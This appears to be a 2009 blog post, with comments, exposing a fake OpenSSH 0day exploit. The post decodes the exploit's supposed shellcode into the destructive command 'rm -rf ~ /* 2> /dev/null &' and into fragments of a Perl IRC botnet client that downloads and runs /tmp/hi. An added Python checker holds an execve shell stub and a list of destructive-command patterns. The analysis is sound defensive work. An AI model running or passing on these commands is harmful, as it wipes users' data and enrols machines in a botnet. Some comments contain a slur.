
Rumor had it that the anti-sec group was using an OpenSSH 0day; today str0ke linked to a URL that supposedly hosts the exploit code for that 0day.

The reason the disassembled shellcode looked like crap is that, well, it isn't shellcode: it is nothing but plain ASCII shell and Perl commands.

Here is that JMP code converted to "assembly":
00000000 jb 0x6f
00000002 and byte[0x7e206672],ch
00000008 and byte[edi],ch
0000000a sub ah,byte[eax]
0000000c xor bh,byte[esi]
0000000e and byte[edi],ch
00000010 fs: gs: jbe 0x43
00000014 outs dx,byte[esi]
00000015 jne 0x83
00000017 ins byte[es:edi],dx
00000018 and byte[esi],ah

Obviously this code doesn't make any sense whatsoever, so here is the same JMP code converted from hex to ASCII:
rm -rf ~ /* 2> /dev/null &
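As an added example (not from the original post), here is the check that makes the point above mechanical: unescape the bytes, measure how much of them is printable ASCII, and grep the result for destructive commands before feeding anything to a disassembler. The 26-byte string is reconstructed from the disassembly listing above (0x72 0x6d = "rm", 0x20 0x2d 0x72 0x66 = " -rf", and so on); the second sample is a constructed classic x86 execve("/bin/sh") stub used as a control; the DANGEROUS patterns are my own choice.

```python
# Added example, not code from the original post: sanity-check a PoC's
# "shellcode" before disassembling it. Booby-trapped exploits hide plain
# text commands in the byte string; real shellcode is mostly non-printable.
import re

# Constructed input: the 26 bytes that the post's listing disassembles as
# "jb 0x6f / and byte[0x7e206672],ch / ...", written as the C-style escaped
# string an exploit PoC would carry.
LINUX_SHELLCODE = (
    r"\x72\x6d\x20\x2d\x72\x66\x20\x7e\x20\x2f\x2a\x20"
    r"\x32\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"
)

# Constructed control sample: a classic x86 Linux execve("/bin/sh") stub.
EXECVE_SHELLCODE = (
    r"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    r"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Commands no legitimate shellcode needs but a fake PoC loves (my own list).
DANGEROUS = [r"rm\s+-rf", r"chmod\s+\+x\s+/tmp/", r"/dev/tcp/", r"dd\s+if=", r"mkfs"]

# Threshold for calling a byte string "text": assumption, tune to taste.
TEXT_THRESHOLD = 0.95


def unescape(s: str) -> bytes:
    """Turn a C-style "\\xNN\\xNN..." string into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0x20-0x7e) or tab/newline/CR."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in b"\t\n\r")
    return ok / len(data)


def analyze(escaped: str) -> dict:
    """Decode the escaped string and report whether it is text, and what it says."""
    data = unescape(escaped)
    ratio = printable_ratio(data)
    text = data.decode("ascii", errors="replace")
    return {
        "length": len(data),
        "printable_ratio": ratio,
        "looks_like_text": ratio >= TEXT_THRESHOLD,
        "text": text,
        "dangerous": [p for p in DANGEROUS if re.search(p, text)],
    }


if __name__ == "__main__":
    for name, sc in (("linux", LINUX_SHELLCODE), ("execve control", EXECVE_SHELLCODE)):
        r = analyze(sc)
        print(f"{name}: {r['length']} bytes, printable {r['printable_ratio']:.2f}, "
              f"text={r['looks_like_text']}, dangerous={r['dangerous']}")
        if r["looks_like_text"]:
            print("  decoded:", r["text"])
```

Running this prints the decoded `rm -rf ~ /* 2> /dev/null &` for the first sample and flags it, while the execve stub comes out around 61% printable and is left alone. The ratio alone is only a heuristic (alphanumeric-encoded shellcode is deliberately printable), so the grep for destructive commands is the part that actually catches this kind of trap.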

The "shellcode" part actually is a Perl IRC bot; only these fragments of it are legible:
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}...
...
while (<$sock>){if (/^PING (.*)$/){print ...
...k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ...
sleep 1;
...chmod +x /tmp/hi 2>/dev/null;/tmp/hi

The supposedly FreeBSD shellcode decodes to the same Perl IRC bot (same $chan, $key, $nick and $server values), ending in:
...chmod +x /tmp/hi 2>/dev/null;/tmp/hi

12 comments

Anonymous said... @ 14 July, 2009 19:37

$key ="fags"
Hahahah!!!

Anonymous said... @ 14 July, 2009 19:45

Hahaha, what happened to your leet disassembly of the perl code from before?

Stefin said... @ 14 July, 2009 20:54

I was so excited to see the code and ran it on my local Linux PC, and all data was lost. I read this only after doing it :-(

DiabloHorn said... @ 14 July, 2009 21:11

This was expected to happen eventually. I wonder how many people will still fall for it though.

Anonymous said... @ 14 July, 2009 21:37

I'm on the euirc staff.
We're investigating the resulting botnet and are about to shut it down asap. It would have been nice if we had been notified earlier, however.

jaj+google said... @ 14 July, 2009 21:40

@Stefin: PEBKAC

Anonymous said... @ 14 July, 2009 21:51

Not only does the shellcode suck and try to rm -rf your system... If you forget about all that and look at the code further down, a big hint that it's fake is "int port=23"... I mean, I'm no expert, but if it's an OpenSSH exploit I would assume it would say port 22 for SSH, not 23, which is usually reserved for Telnet.

DiabloHorn, far too many people will fall for it unfortunately.

Anonymous said... @ 15 July, 2009 10:06

Hmm..
Found this out yesterday.
Actually learned a lot about security and backup-strategies at the same time :-/

Anonymous said... @ 15 July, 2009 12:53

Same as here: http://blogs.securiteam.com/index.php/archives/1302

pbx06 said... @ 17 July, 2009 03:43

Just wondering, how did you convert the opcode values => asm?

Using gdb you can go from bin => opcode values.

pbx06 said... @ 17 July, 2009 03:50

The strange thing is that all IPs that try to bruteforce my server are hosts that run OpenSSH 4.3.
However, according to
http://www.h-online.com/security/OpenSSH-zero-day-exploit-rumours-not-confirmed--/news/113731

OpenSSH zero day exploit rumours not confirmed

Is this disinformation spread deliberately by the hacker group? The fact is that proving that your URL isn't an OpenSSH exploit.

Also, many people think that astalavista was exposed by an OpenSSH bug, while a message on a mailing list shows that lightspeed was exploited, then a local privilege escalation.

Anonymous said... @ 20 July, 2009 18:28

anti-sec fags forgot to put --no-preserve-root in their code. idiots
